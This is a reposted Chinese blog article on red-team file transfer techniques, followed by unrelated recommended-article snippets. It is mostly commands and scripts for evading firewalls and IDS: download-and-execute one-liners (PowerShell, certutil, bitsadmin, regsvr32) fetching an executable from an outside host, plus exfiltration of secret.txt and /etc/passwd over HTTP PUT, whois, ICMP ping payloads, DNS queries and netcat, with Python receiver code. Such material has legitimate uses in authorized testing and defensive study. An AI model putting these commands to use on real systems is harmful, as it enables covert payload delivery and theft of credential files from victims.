渗透测试中的文件传输技巧

最新推荐文章于 2025-11-16 13:02:04 发布
转载 最新推荐文章于 2025-11-16 13:02:04 发布 · 1.7k 阅读 · 2 ·
CC 4.0 BY-SA版权
原文链接:https://paper.seebug.org/834/

部署运行你感兴趣的模型镜像

目录

搭建 HTTP server

Python

PHP 5.4+

Ruby

Ruby 1.9.2+

Perl

busybox httpd

Download files from HTTP server

Windows

Linux

Setup HTTP PUT server

使用 Nginx 搭建 HTTP PUT Server

使用 Python 搭建 HTTP PUT Server

上传文件到 HTTP PUT server

Linux

Windows

使用 Bash /dev/tcp 进行文件传输

使用 SMB 协议进行文件传输

搭建简易 SMB Server

使用 whois 命令进行文件传输

使用 ping 命令进行文件传输

使用 dig 命令进行文件传输

使用 NetCat 进行文件传输

参考链接

在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的工具进行文件传输的方法。

搭建 HTTP server

Python

python2:

python -m SimpleHTTPServer 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

python3:

python -m http.server 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

PHP 5.4+

当 PHP 版本大于 5.4 是,可使用 PHP 在当前目录启动 HTTP 服务,端口为 1337

php -S 0.0.0.0:1337

Ruby

下面的命令会在当前目录下启动 HTTP 服务,端口为 1337

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+

ruby -run -e httpd . -p 1337

Perl

perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'
perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

Thanks to: http://stackoverflow.com/questions/8058793/single-line-python-webserver

busybox httpd

busybox httpd -f -p 8000

本条来自:lvm

Download files from HTTP server

以下列出了在 Windows 和 Linux 系统下使用系统自带工具从 HTTP Server 下载文件的几种方法

Windows

powershell

下载并执行:

powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'

certutil

下载并执行:

certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe

bitsadmin

下载并执行:

bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe

bitsadmin 的下载速度比较慢

regsvr32

regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

Linux

Curl

curl http://1.2.3.4/backdoor

Wget

wget http://1.2.3.4/backdoor

awk

在使用 awk 进行下载文件时,首先使用以上列出的任意一条命令启动一个 HTTP Server

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

效果:

img

Setup HTTP PUT server

以下列出了上传文件到 HTTP Server 的几种方法

使用 Nginx 搭建 HTTP PUT Server

mkdir -p /var/www/upload/ # 创建目录 
chown www-data:www-data /var/www/upload/ # 修改目录所属用户和组
cd /etc/nginx/sites-available # 进入 nginx 虚拟主机目录

# 写入配置到 file_upload 文件
cat <<EOF > file_upload
server {
    listen 8001 default_server;
    server_name kali;
        location / {
        root /var/www/upload;
        dav_methods PUT;
    }
}
EOF
# 写入完毕
cd ../sites-enable # 进入 nginx 虚拟主机启动目录
ln -s /etc/nginx/sites-available/file_upload file_upload # 启用 file_upload 虚拟主机
systemctl start nginx # 启动 Nginx

使用 Python 搭建 HTTP PUT Server

以下代码保存到 HTTPutServer.py 文件里:

# ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server
import sys
import signal
from threading import Thread
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler



class PUTHandler(BaseHTTPRequestHandler):
    def do_PUT(self):
        length = int(self.headers['Content-Length'])
        content = self.rfile.read(length)
        self.send_response(200)
        with open(self.path[1:], "w") as f:
            f.write(content)


def run_on(port):
    print("Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ...".format(sys.argv[1], port))
    server_address = (sys.argv[1], port)
    httpd = HTTPServer(server_address, PUTHandler)
    httpd.serve_forever()


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage:\n\tpython {0} ip 1337".format(sys.argv[0]))
        sys.exit(1)
    ports = [int(arg) for arg in sys.argv[2:]]
    try:
        for port_number in ports:
            server = Thread(target=run_on, args=[port_number])
            server.daemon = True # Do not make us wait for you to exit
        server.start()
        signal.pause() # Wait for interrupt signal, e.g. KeyboardInterrupt
    except KeyboardInterrupt:
        print "\nPython HTTP PUT Server Stoped."
        sys.exit(1)

运行方法:

$ python HTTPutServer.py 10.10.10.100 1337
Starting a HTTP PUT Server on 10.10.10.100 port 1337 (http://10.10.10.100:1337) ...

上传文件到 HTTP PUT server

Linux

Curl

$ curl --upload-file secret.txt http://ip:port/

Wget

$ wget --method=PUT --post-file=secret.txt http://ip:port/

Windows

Powershell

$body = Get-Content secret.txt
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body

使用 Bash /dev/tcp 进行文件传输

首先需要监听端口

文件接收端:

nc -lvnp 1337 > secret.txt

文件发送端:

cat secret.txt > /dev/tcp/ip/port

img

使用 SMB 协议进行文件传输

搭建简易 SMB Server

搭建简易SMB Server 需要用到 Impacket 项目的 smbserver.py 文件

Impacket 已默认安装在 Kali Linux 系统中

syntax: impacker-smbserver ShareName SharePath

$ mkdir smb # 创建 smb 目录
$ cd smb # 进入 smb目录
$ impacket-smbserver share `pwd` # 在当前目录启动 SMB server,共享名称为 share

效果:

img

从 SMB server 下载文件

copy \\IP\ShareName\file.exe file.exe

上传文件到 SMB server

net use x: \\IP\ShareName

copy file.txt x:

net use x: /delete

使用 whois 命令进行文件传输

/etc/passwd

Host A

Host B

接收端 Host B:

nc -vlnp 1337 | sed "s/ //g" | base64 -d

发送端 Host A:

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64`

效果:

img

使用 ping 命令进行文件传输

secret.txt

Sender

Reciver

发送端:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

接收端:

以下代码保存到 ping_receiver.py

import sys

try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")
    sys.exit(0)


def process_packet(pkt):
    if pkt.haslayer(ICMP):
        if pkt[ICMP].type == 8:
            data = pkt[ICMP].load[-4:]
            print(f'{data.decode("utf-8")}', flush=True, end="", sep="")

sniff(iface="eth0", prn=process_packet)

执行方法:

python3 ping_receiver.py

效果

使用 dig 命令进行文件传输

/etc/passwd

Sender

Reciver

发送端:

xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done

接收端:

以下代码使用了 python 的 scapy 模块,需要手动安装

代码保存到 dns_reciver.py 文件中

try:
    from scapy.all import *
except:
    print("Scapy not found, please install scapy: pip install scapy")

def process_packet(pkt):
    if pkt.haslayer(DNS):
        domain = pkt[DNS][DNSQR].qname.decode('utf-8')
        root_domain = domain.split('.')[1]
        if root_domain.startswith('gooogle'):
            print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='')

sniff(iface="eth0", prn=process_packet)

运行方法:

python3 dns_reciver.py

效果:

Transfer files via dig

img

使用 NetCat 进行文件传输

1.txt

A:10.10.10.100

B:10.10.10.200

接受端:

nc -l -p 1337 > 1.txt

发送端:

cat 1.txt | nc -l -p 1337

或者

nc 10.10.10.200 1337 < 1.txt

在极端环境下,如果接受端没有 nc 可以使用 Bash 的 /dev/tcp 接收文件:

cat < /dev/tcp/10.10.10.200/1337 > 1.txt

img

 

 

您可能感兴趣的与本文相关的镜像

Python3.10

Python3.10

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

whatday
关注
Boost:传输文件的测试程序
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-22 481
Boost:传输文件的测试程序实现功能C++实现代码 实现功能 boost::asio模块,传输文件的测试程序 C++实现代码 #include <ctime> #include <iostream> #include <string> #include <boost/bind/bind.hpp> #include <boost/shared_ptr.hpp> #include <boost/enable_shared_from_this.h
[渗透测试]Vulnstack 红队(二)
cosmoslin的博客
02-10 2385
域环境初始化 DC IP:10.10.10.10 OS:Windows 2012(64) 应用:AD域 WEB IP1:10.10.10.80 IP2:192.168.111.80 OS:Windows 2008(64) 应用:Weblogic 10.3.6 MSSQL 2008 PC IP1:10.10.10.201 IP2:192.168.111.201 OS:Windows 7(32) 应用: 攻击机 IP:192.168.111.5 OS:Kali weblogic漏洞利用 nm
[渗透测试]ATT&CK实战 | Vulnstack 红队(二)
Y4tacker的博客
12-06 2232
文章目录环境来源为什么写这篇文章配置nmap扫描启动smbserver共享文件服务打爆weblogic提权使用 procdump64+mimikatz 获取 win 用户明文密生成管理帐号密码用户凭证-连接域控服务器-反弹域控 shel参考文章 环境来源 来源于https://mp.weixin.qq.com/s/uLlWJdcAc6MmUyuruHygNA,尊重人家作者,还是自己去问人家要吧 为什么写这篇文章 给一些不必要细节删除,以及一些自己觉得细节的补充 配置 nmap扫描 常用端口是开放状态1
nginx-dav-ext-module 技术文档
最新发布
gitblog_01240的博客
11-16 1069
### 系统要求 - **nginx版本**: >= 1.13.4 - **库依赖**: - `libxml2` - `libxslt`(虽然技术上是非必需的,但因与nginx的xslt模块兼容而推荐) ### 编译与安装 #### 静态模块安装 在编译nginx时,需要添加特定参数以包含此扩展模块: ```bash ./configure --with-http_dav_mo
内网渗透瑞士军刀-impacket工具解析(四)
失心少年
05-18 1474
前两篇我们介绍了impacket中对DCERPC协议的内容,今天我们对Windows网络中另一个应用层协议的内容进行介绍,在Windows网络中最常用的协议就是SMB协议了,SMB(Server Message Block) 是一种用于在计算机网络上共享文件、打印机和其他资源的协议。在impacket中基于SMB协议主要实现远程文件访问及DCERPC调用两大作用,在SMBv1实现了标准的SMB认证,SMBv1和SMBv2中都实现了NTLM和Kerberos的拓展认证方式。
内网渗透域渗透中的文件传输
weixin_30251587的博客
03-08 609
Linux-UnixlikeOS环境下的 scp命令 适合unixlikeos系统之间 #上传 scp [-r] /locapath/localfile username@target_linux:/remotepath/remotefile # 下载 scp [-r] username@target_linux:/remotepath/remotefile /locapath/localfi...
网络安全渗透测试:操作系统命令与技巧用于文件操作及反弹Shell
11-17
文中详细介绍了基本的概念,如渗透测试中常见的术语、漏洞、攻击以及后门等内容;探讨了操作系统的重要知识点,涵盖了命令执行、用户管理、文件权限与服务权限等。此外,文档还提供了关于文件下载的方法及其应用场景...
16、Kali Linux 2.0 渗透测试中的文件传输技巧
nept的博客
08-31 35
本文详细介绍了在 Kali Linux 2.0 渗透测试过程中涉及的各种文件传输技巧。内容涵盖前期准备、非交互式 shell 的处理、与 Windows 主机的文件传输方法、不同传输方式的对比以及实际应用中的注意事项。通过学习这些技术,渗透测试人员可以灵活选择适合特定环境的文件传输方式,提高测试效率。
渗透测试的一些小技巧
黑战士的博客
08-12 1142
11、访问网站更改请求头,插件User-Agent switch,修改UA,可以更改请求方式访问安卓、iPhone、PC等可以访问的页面,可能会访问到浏览器访问不到的信息。15、在渗透测试时候,发现有某个html标签调用服务器内图片的,并且是那种加入服务器ip地址,可以通过修改host头来fuzz一下,看看下是否存在xss。17、测试注入的时候,可以psot/get更换,自定义一些参数,删除一些参数,加上分块,以及burp有时候有这种口口符号,可以删除再测试payload。
Kali Linux下渗透测试中的文件传输技术
文件传输技术可以帮助渗透测试人员在目标系统中移动文件、数据或恶意代码,以便执行后续攻击或收集信息。 ## 1.1 什么是渗透测试渗透测试(Penetration Testing)是一种通过模拟真实攻击来评估计算机系统、网络...
网络安全渗透测试中的信息收集方法与实践
12-05
4. 敏感信息收集:这涉及收集可能帮助渗透测试人员获得对系统访问权限的信息,如未公开的目录、敏感文件或密码。 5. 服务器信息收集:了解目标服务器的类型和运行的服务对于发现漏洞至关重要。 6. 端口信息收集:...
后渗透——内网转发之利用ftp实现文件传输
01-09
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。无论是Linux还是Windows系统都可以使用,而且是默认安装的。 ftp使用说明: 在命令行直接输入ftp便可进入交互模式,输入?可查看所有能用的命令,后加相应的命令可查看功能显
渗透测试报告
11-14
详细描述了渗透测试的基本过程,和渗透测试的基本步骤,值得学习!!
渗透测试基础
12-18
WEB安全基础教程,主要介绍渗透测试的基本流程、工具使用、常见漏洞等内容。
文件上传和下载的常见测试点
01-12
文件上传和下载的常见测试点 上传名命名规范等 下载文件的大小,存在性等
内网渗透----文件传输
浅笑996的博客
03-08 1593
0x01.Windows目标 1.FTP echo open 192.168.0.23 2121 &amp;amp;gt;&amp;amp;gt; 1.txt //登陆FTP服务器 echo 123&amp;amp;gt;&amp;amp;gt;1.txt //用户名 echo 123&amp;amp;gt;&amp;amp;gt;1.txt
渗透测试之内网渗透中的数据传输
Blood_Pupil的博客
07-01 1813
DNS隧道
利用向日葵软件进行渗透测试技巧与方法
"本文主要介绍了向日葵软件在渗透测试中的应用,包括向日葵软件的基本功能、安装方法以及在特定场景下如何替换目标连接密码。向日葵是一款跨平台的远程控制工具,适用于多种操作系统,如Windows、Linux、MacOS、...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值